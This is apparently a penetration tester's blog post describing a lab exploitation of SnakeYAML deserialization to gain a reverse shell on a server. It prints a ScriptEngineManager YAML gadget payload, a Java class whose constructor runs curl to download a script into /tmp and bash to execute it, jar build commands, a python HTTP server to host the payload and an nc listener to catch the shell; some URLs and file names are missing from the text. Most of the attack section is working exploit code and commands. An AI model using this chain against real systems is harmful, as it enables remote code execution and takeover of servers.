Snake YAML for Reverse SHELL

Hi Brother,

I want to share a short journey during my Pentesting in the lab to keep me updated. I want to share the vulnerability here is not new, but it is quite easy to be exploited and very straightforward. I also found that some swagger yaml based applications still vulnerable to this

During the enumeration of an application, I found that the application give an error message that allow me to find some good information where this application is using yaml parser from snakeyaml

Based on the above information then I found a good article that telling this yaml parser library has vulnerability on the deserialization where with the code below then you can actually invoke a remote command execution

This is the exploit that we can develop for the test, We can download it from

!!javax.script.ScriptEngineManager [
  !! [[
    !! [""]

So whenever I put them in parser then then remote command execution is triggered

In the above picture we can see that whenever the snakeyaml does the parsing then the remote code execution is triggered

Lets weaponized the payload. Lets look into the in order to trigger the reverse shell.

public AwesomeScriptEngineFactory() {
        try {
            Runtime.getRuntime().exec("curl -o /tmp/");
            Runtime.getRuntime().exec("bash /tmp/");
        } catch (IOException e) {

Above is my code in order to download the reverse shell and execute it in the server.

Do not forget to compile into jar file

javac src/artsploit/
jar -cvf yaml-payload.jar -C src/ .

This is the reverse shell command that I saved in the file that is going to be download and executed in the server

So whenever all the above is ready then I need to setup the http server in order to host the

python3 -m http.server 8009                                                                                                                                                                                                        Serving HTTP on port 8009 ( ..

and the next is to run the nc server to listen the reverse shell connection

nc -nlvp 9090   
listening on [any] 9090 ...

Lets execute the attack and wait for the reverse shell to connect back to us

and now the reverse connection has been established

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s